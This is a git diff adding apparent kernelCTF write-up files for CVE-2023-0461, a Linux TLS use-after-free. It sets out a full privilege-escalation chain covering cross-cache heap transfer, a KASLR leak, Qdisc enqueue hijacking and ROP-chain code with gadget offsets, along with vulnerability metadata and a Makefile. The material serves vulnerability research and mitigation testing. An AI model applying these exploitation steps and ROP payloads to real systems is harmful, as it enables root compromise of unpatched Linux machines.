google · koczkatamas · Aug 24, 2023 · Jun 22, 2023 · Jun 26, 2023 · Jul 11, 2023
diff --git a/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/exploit.md
@@ -0,0 +1,208 @@
+# Attacking Objects
+
+- **Heap grooming**: cbq_class + pfifo Qdisc [kmalloc-512]
+- **Cache transfer**: fqdir (bucket_table pointer) [UAF from kmalloc-512 to dyn-kmalloc-1k]
+- **Information leak/KASLR bypass**: user_key_payload + tbf Qdisc (tbf_qdisc_ops) [dyn-kmalloc-1k]
+- **RIP control**: tbf Qdisc (RIP hijacked via qdisc->enqueue()) [dyn-kmalloc-1k]
+
+# TL;DR
+
+Transfer exploitation primitives from a fixed to a dynamic cache exploiting fqdir objects to cause a Use-After-Free in dyn-kmalloc-1k from kmalloc-512.
+
+Once in the dynamic cache, corrupt a user_key_payload structure with a Qdisc object and leak the tbf_qdisc_ops pointer to bypass KASLR.
+
+Finally, corrupt the Qdisc structure and send data to the respective network interface to hijack control flow when packets are enqueued.
+
+# Overview
+
+PS: This exploit originally targeted the `mitigation-6.1-broken` instance, it was later slightly modified to work on `mitigation-6.1-v2`.
+The technique used to compromise both instances remains the same.
+
+---
+
+In the Linux kernel, there are multiple objects allocated in fixed caches that contain pointers to other structures allocated in dynamic caches.
+
+The [fqdir](https://elixir.bootlin.com/linux/v6.1/source/include/net/inet_frag.h#L12) structure, [allocated](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L186) in kmalloc-512 when a new network namespace [is initialized](https://elixir.bootlin.com/linux/v6.1/source/net/core/net_namespace.c#L332), with its [bucket_table](https://elixir.bootlin.com/linux/v6.1/source/include/linux/rhashtable.h#L76) pointer (`fqdir->rhashtable.tbl`), allocated in dyn-kmalloc-1k ([fqdir_init()](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L195) -> [rhashtable_init()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L1015) -> [bucket_table_alloc()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L175)), is an example.
+
+```c
+/* Per netns frag queues directory */
+struct fqdir {
+	/* sysctls */
+	long			high_thresh;
+	long			low_thresh;
+	int			timeout;
+	int			max_dist;
+	struct inet_frags	*f;
+	struct net		*net;
+	bool			dead;
+	struct rhashtable       rhashtable ____cacheline_aligned_in_smp; // ***
+
+	/* Keep atomic mem on separate cachelines in structs that include it */
+	atomic_long_t		mem ____cacheline_aligned_in_smp;
+	struct work_struct	destroy_work;
+	struct llist_node	free_list;
+};
+
+struct rhashtable {
+	struct bucket_table __rcu	*tbl; // ***
+	unsigned int			key_len;
+	unsigned int			max_elems;
+	struct rhashtable_params	p;
+	bool				rhlist;
+	struct work_struct		run_work;
+	struct mutex                    mutex;
+	spinlock_t			lock;
+	atomic_t			nelems;
+};
+
+struct bucket_table {
+	unsigned int		size;
+	unsigned int		nest;
+	u32			hash_rnd;
+	struct list_head	walkers;
+	struct rcu_head		rcu;
+	struct bucket_table __rcu *future_tbl;
+	struct lockdep_map	dep_map;
+	struct rhash_lock_head __rcu *buckets[] ____cacheline_aligned_in_smp;
+};
+```
+
+The idea behind the technique used in this exploit, is that corrupting these kind of objects in a fixed cache utilizing a slab-use-after-free/double-free or a slab-out-of-bounds, it is possible to transfer exploitation primitives from a fixed to a dynamic cache, bypassing the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE.
+
+Once in the dynamic cache, elastic objects can be "unlocked" to complete the exploitation process. In this writeup I refer to this attack as cache transfer.
+
+# Exploit Analysis
+
+The exploit consists of three stages:
+
+- Cache transfer (UAF from kmalloc-512 to dyn-kmalloc-1k)
+- KASLR bypass (in dyn-kmalloc-1k)
+- RIP-control (in dyn-kmalloc-1k)
+
+## Cache Transfer
+After initializing some dummy network interfaces and some heap grooming in kmalloc-512 utilizing [cbq_class](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L71) and pfifo [Qdisc](https://elixir.bootlin.com/linux/v6.1/source/include/net/sch_generic.h#L72) objects, both allocated by [cbq_change_class()](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1394) ([1](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1527), [2](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1551)) when a new cbq traffic class is created, I exploited [CVE-2023-0461](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0461) to make the [icsk_ulp_data](https://elixir.bootlin.com/linux/v6.1/source/include/net/inet_connection_sock.h#L99) pointers of two sockets point to the same [tls_context](https://elixir.bootlin.com/linux/v6.1/source/include/net/tls.h#L235) in kmalloc-512. 
+
+Freeing one of the sockets, the tls_context structure was also freed, so I could cause a Use-After-Free as the icsk_ulp_data pointer of the other socket was still pointing to the freed object. (Step 1.0 in exploit.c)
+
+I proceeded by replacing the freed tls_context in kmalloc-512 with a fqdir structure, this way, freeing the second socket I could arbitrarily free the fqdir object. (Step 1.1 in exploit.c)
+
+In the next step, I exploited the Use-After-Free spraying fqdir again. This time my goal was to overlap another fqdir to the one just freed, making their bucket_table pointers point to the same table in dyn-kmalloc-1k. (Step 1.2 in exploit.c)
+
+At this point, freeing one of the overlapped objects, the shared bucket_table was also freed ([fqdir_exit()](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L218) -> [fqdir_work_fn()](https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L176) -> [rhashtable_free_and_destroy()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L1130) -> [bucket_table_free()](https://elixir.bootlin.com/linux/v6.1/source/lib/rhashtable.c#L109)), so I could cause a Use-After-Free in dyn-kmalloc-1k as the bucket_table pointer of the other fqdir was still pointing to the freed table. (Step 1.3 in exploit.c)
+
+Now I only had to replace the freed table with a [user_key_payload](https://elixir.bootlin.com/linux/v6.1/source/include/keys/user-type.h#L27) structure, then, freeing the second fqdir, I could arbitrarily free the user key and complete the cache transfer. (Step 1.4 - 1.5 in exploit.c)
+
+```c
+struct user_key_payload {
+	struct rcu_head	rcu;
+	unsigned short	datalen; // ***
+	char		data[] __aligned(__alignof__(u64)); // ***
+};
+```
+
+## KASLR Bypass
+
+Once in dyn-kmalloc-1k, I overlapped the freed key with a tbf [Qdisc](https://elixir.bootlin.com/linux/v6.1/source/include/net/sch_generic.h#L72) structure (allocated by [qdisc_alloc()](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_generic.c#L938)), overwriting the key size with Qdisc.flags (0x10) and the first qword of the key payload with Qdisc.ops, `tbf_qdisc_ops` in this case. (Step 2.0 in exploit.c)
+
+```c
+struct Qdisc {
+	int 			(*enqueue)(struct sk_buff *skb,
+					   struct Qdisc *sch,
+					   struct sk_buff **to_free); // ***
+	struct sk_buff *	(*dequeue)(struct Qdisc *sch);
+	unsigned int		flags; // ***
+	u32			limit;
+	const struct Qdisc_ops	*ops; // ***
+	struct qdisc_size_table	__rcu *stab;
+	struct hlist_node       hash;
+	u32			handle;
+	u32			parent;
+
+	struct netdev_queue	*dev_queue;
+
+	struct net_rate_estimator __rcu *rate_est;
+	struct gnet_stats_basic_sync __percpu *cpu_bstats;
+	struct gnet_stats_queue	__percpu *cpu_qstats;
+	int			pad;
+	refcount_t		refcnt;
+
+	/*
+	 * For performance sake on SMP, we put highly modified fields at the end
+	 */
+	struct sk_buff_head	gso_skb ____cacheline_aligned_in_smp;
+	struct qdisc_skb_head	q;
+	struct gnet_stats_basic_sync bstats;
+	struct gnet_stats_queue	qstats;
+	unsigned long		state;
+	unsigned long		state2; /* must be written under qdisc spinlock */
+	struct Qdisc            *next_sched;
+	struct sk_buff_head	skb_bad_txq;
+
+	spinlock_t		busylock ____cacheline_aligned_in_smp;
+	spinlock_t		seqlock;
+
+	struct rcu_head		rcu;
+	netdevice_tracker	dev_tracker;
+	/* private data */
+	long privdata[] ____cacheline_aligned;
+};
+```
+
+After corrupting the user key, I leaked the `tbf_qdisc_ops` pointer from the `Qdisc` structure so I could bypass KASLR. (Step 2.1 in exploit.c)
+
+## RIP-Control
+
+In the final steps, I freed all the keys in dyn-kmalloc-1k including the one corrupted by Qdisc, and I reallocated them, overwriting the Qdisc structure. I overwritten the `qdisc->enqueue()` function pointer with a stack pivot gadget storing the rest of the ROP-chain in the same chunk. (Step 3.0 - 3.1 in exploit.c)
+
+Finally, I sent packets to the network interface to trigger the call to [dev_qdisc_enqueue()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3779) in [__dev_xmit_skb()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3825), this way I could hijack control flow. (Step 3.2 in exploit.c)
+
+Note that when `qdisc->enqueue()` is called, RSI (and RBP in other kernel builds) already contains the address of the corrupted Qdisc chunk itself, where the ROP-chain was stored, so it is not necessary to leak a heap address / know the address of the corrupted chunk.
+
+## Post-RIP
+
+After hijacking control flow, two problems arose. Since `qdisc->enqueue()` is called in an atomic / RCU read-side critical section, when I returned to user space, instead of getting a root shell, the kernel panicked showing two error messages:
+
+- `"Illegal context switch in RCU read-side critical section"` 
+
+- `"BUG: scheduling while atomic: [...]"`
+
+Fortunately, I managed to bypass both of them.
+
+To bypass "RCU read-side critical section", a write-what-where gadget was used in the ROP-chain to set `current->rcu_read_lock_nesting = 0`.
+
+```c
+	// current = find_task_by_vpid(getpid())
+	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
+	rop[idx++] = getpid();                   // pid
+	rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid
+
+	// current += offsetof(struct task_struct, rcu_read_lock_nesting)
+	rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
+	rop[idx++] = 0x46c;                      // offsetof(struct task_struct, rcu_read_lock_nesting)
+	rop[idx++] = kbase + 0xffffffff8107befa; // add rax, rsi ; jmp 0xffffffff82404440 (retpoline)
+
+	// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
+	rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
+	rop[idx++] = 0;                          // 0
+	rop[idx++] = kbase + 0xffffffff8167104b; // mov qword ptr [rax], rcx ; jmp 0xffffffff82404440 (retpoline)
+```
+
+To bypass "scheduling while atomic" instead, the kernel was tricked into believing that a oops was in progress setting [oops_in_progress](https://elixir.bootlin.com/linux/v6.1/source/include/linux/printk.h#L15) to 1:
+
+```c
+	// Bypass "schedule while atomic": set oops_in_progress = 1 
+	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
+	rop[idx++] = 1;                          // 1
+	rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
+	rop[idx++] = kbase + 0xffffffff8419f478; // oops_in_progress
+	rop[idx++] = kbase + 0xffffffff81246359; // mov qword ptr [rsi], rdi ; jmp 0xffffffff82404440 (retpoline)
+```
+
+If `oops_in_progress` contains a non-zero value indeed, [__schedule_bug()](https://elixir.bootlin.com/linux/v6.1/source/kernel/sched/core.c#L5730) will simply return without triggering any error, and we will be able to gracefully return to userspace.
+
+# Additional information
+
+mitigation-6.1-v2 update: After enabling the `KMALLOC_SPLIT_VARSIZE` mitigation and making some minor adjustments to the source code, the exploit reliability improved to about 80%, even though limited time was dedicated to this aspect.
+This may at first seem paradoxical, but it is actually a side effect of separating objects into multiple caches, slabs tend to be less prone to noise, and this leads to increased stability.
+
+Considering that my original exploit for this vulnerability for a system without experimental mitigations was only ~150 lines of code, did not require user namespaces, and was very stable, the experimental mitigations, despite being bypassed by the technique described above, are very effective and have successfully stopped many of my other exploitation strategies. I will probably cover some of these failed (but very interesting!) attempts on [my blog](https://syst3mfailure.io).
diff --git a/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/novel-techniques.md
@@ -0,0 +1,58 @@
+# Exploitation techniques
+
+To my knowledge, the following exploitation techniques are not known/publicly-documented:
+
+- **Cache transfer** (Mitigation bypass): In the Linux kernel, there are multiple structures allocated in fixed caches that contain pointers to other objects allocated in dynamic caches. These structures act as junction points between fixed and dynamic caches.
+
+    Corrupting this kind of objects it is possible to transfer exploitation primitives from a fixed to a dynamic cache bypassing the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE. 
+
+    For example, for this submission, I exploited [fqdir](https://elixir.bootlin.com/linux/v6.1/source/include/net/inet_frag.h#L12) objects and their [bucket_table](https://elixir.bootlin.com/linux/v6.1/source/include/linux/rhashtable.h#L76) pointers to cause a Use-After-Free in dyn-kmalloc-1k from kmalloc-512 (See exploit.md/comments in exploit.c for more details). Once in the dynamic cache, I could "unlock" elastic objects to complete the exploitation process.
+
+    The technique can be generalized and applied in other fixed caches looking for objects with similar properties. In this case the exploited vulnerability was a Use-After-Free, but it is also possible to apply the technique exploiting Out-Of-Bounds-Write vulnerabilities (e.g. partially overwriting a pointer to an object in a dynamic cache, making it point to another object in the slab, and then tricking the kernel into freeing the wrong structure).
+
+
+- **RIP-Control via Qdisc**: Overwriting the `enqueue()` function pointer of a Qdisc structure, it is possible to hijack control flow when packets are enqueued to the respective network interface by [dev_qdisc_enqueue()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3779) in [__dev_xmit_skb()](https://elixir.bootlin.com/linux/v6.1/source/net/core/dev.c#L3825).
+
+    A heap leak is not required because when control flow is hijacked, RSI (and RBP in other kernel builds) already contains the address of the corrupted Qdisc chunk, where the ROP-chain was stored.
+
+    [Qdisc](https://elixir.bootlin.com/linux/v6.1/source/include/net/sch_generic.h#L72) structures, are allocated by [qdisc_alloc()](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_generic.c#L938). The allocation size is determined by the size of the `private` flexible array. [Sometimes](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_cbq.c#L1551) the Qdisc size can be determined at compile time, so this object is particularly interesting because it can be used to hijack control flow in both fixed and dynamic caches.
+
+    For this submission, I used the tbf packet scheduler with the [tbf_sched_data](https://elixir.bootlin.com/linux/v6.1/source/net/sched/sch_tbf.c#L97) used as private field of a Qdisc, so the object was allocated in dyn-kmalloc-1k.
+
+
+# Post-RIP
+
+- Sometimes, after RIP control, exploits do not work because the ROP-chain is executed in an atomic context. In that case the kernel panics showing a "scheduling while atomic" message.
+
+    For example, in [this very interesting kCTF writeup](https://blog.kylebot.net/2022/10/16/CVE-2022-1786/), Kylebot hijacked control flow utilizing timerfd_ctx objects, overwriting `timerfd_ctx->tmr.function`, but "scheduling while atomic" prevented him from getting a root shell, so he had to opt for another strategy.
+
+    To get around this problem, the kernel can be tricked into believing that a oops is in progress setting [oops_in_progress](https://elixir.bootlin.com/linux/v6.1/source/include/linux/printk.h#L15) to a non-zero value. This way
+    [__schedule_bug()](https://elixir.bootlin.com/linux/v6.1/source/kernel/sched/core.c#L5730) will return without triggering any error:
+
+```c
+	// Bypass "schedule while atomic": set oops_in_progress = 1 
+	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
+	rop[idx++] = 1;                          // 1
+	rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
+	rop[idx++] = kbase + 0xffffffff8419f478; // oops_in_progress
+	rop[idx++] = kbase + 0xffffffff81246359; // mov qword ptr [rsi], rdi ; jmp 0xffffffff82404440 (retpoline)
+```
+
+- Another similar problem arises when the ROP-chain is executed in a RCU read-side critical section. This problem can be easily bypassed setting `current->rcu_read_lock_nesting = 0`:
+
+```c
+	// current = find_task_by_vpid(getpid())
+	rop[idx++] = kbase + 0xffffffff811481f3; // pop rdi ; jmp 0xffffffff82404440 (retpoline)
+	rop[idx++] = getpid();                   // pid
+	rop[idx++] = kbase + 0xffffffff8110a0d0; // find_task_by_vpid
+
+	// current += offsetof(struct task_struct, rcu_read_lock_nesting)
+	rop[idx++] = kbase + 0xffffffff810a08ae; // pop rsi ; ret
+	rop[idx++] = 0x46c;                      // offsetof(struct task_struct, rcu_read_lock_nesting)
+	rop[idx++] = kbase + 0xffffffff8107befa; // add rax, rsi ; jmp 0xffffffff82404440 (retpoline)
+
+	// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
+	rop[idx++] = kbase + 0xffffffff811e3633; // pop rcx ; ret
+	rop[idx++] = 0;                          // 0
+	rop[idx++] = kbase + 0xffffffff8167104b; // mov qword ptr [rax], rcx ; jmp 0xffffffff82404440 (retpoline)
+```
diff --git a/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-0461_mitigation/docs/vulnerability.md
@@ -0,0 +1,13 @@
+- Requirements:
+	- Capabilities: No
+	- Kernel configuration: CONFIG_TLS or CONFIG_XFRM_ESPINTCP
+	- User namespaces required: No
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=734942cc4ea6478eed125af258da1bdbb4afe578 (tcp: ULP infrastructure)
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=2c02d41d71f90a5168391b6a5f2954112ba2307c (net/ulp: prevent ULP without clone op from entering the LISTEN status)
+- Affected kernel versions: 4.13-rc1 - 6.2-rc3
+- Affected component: net/tls
+- Cause: Use-After-Free
+- Syscall to disable: setsockopt TCP_ULP
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0461
+- Description:
+	There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be configured, but the operation does not require any privilege. There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock. When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable. The setsockopt TCP_ULP operation does not require any privilege.
diff --git a/pocs/linux/kernelctf/CVE-2023-0461_mitigation/exploit/mitigation-6.1/Makefile b/pocs/linux/kernelctf/CVE-2023-0461_mitigation/exploit/mitigation-6.1/Makefile
@@ -0,0 +1,10 @@
+exploit:
+	gcc -o exploit exploit.c -lkeyutils -O0 -static -s
+
+prerequisites:
+	sudo apt-get install libkeyutils-dev
+run:
+	./exploit
+
+clean:
+	rm exploit
diff --git a/pocs/linux/kernelctf/CVE-2023-0461_mitigation/exploit/mitigation-6.1/exploit b/pocs/linux/kernelctf/CVE-2023-0461_mitigation/exploit/mitigation-6.1/exploit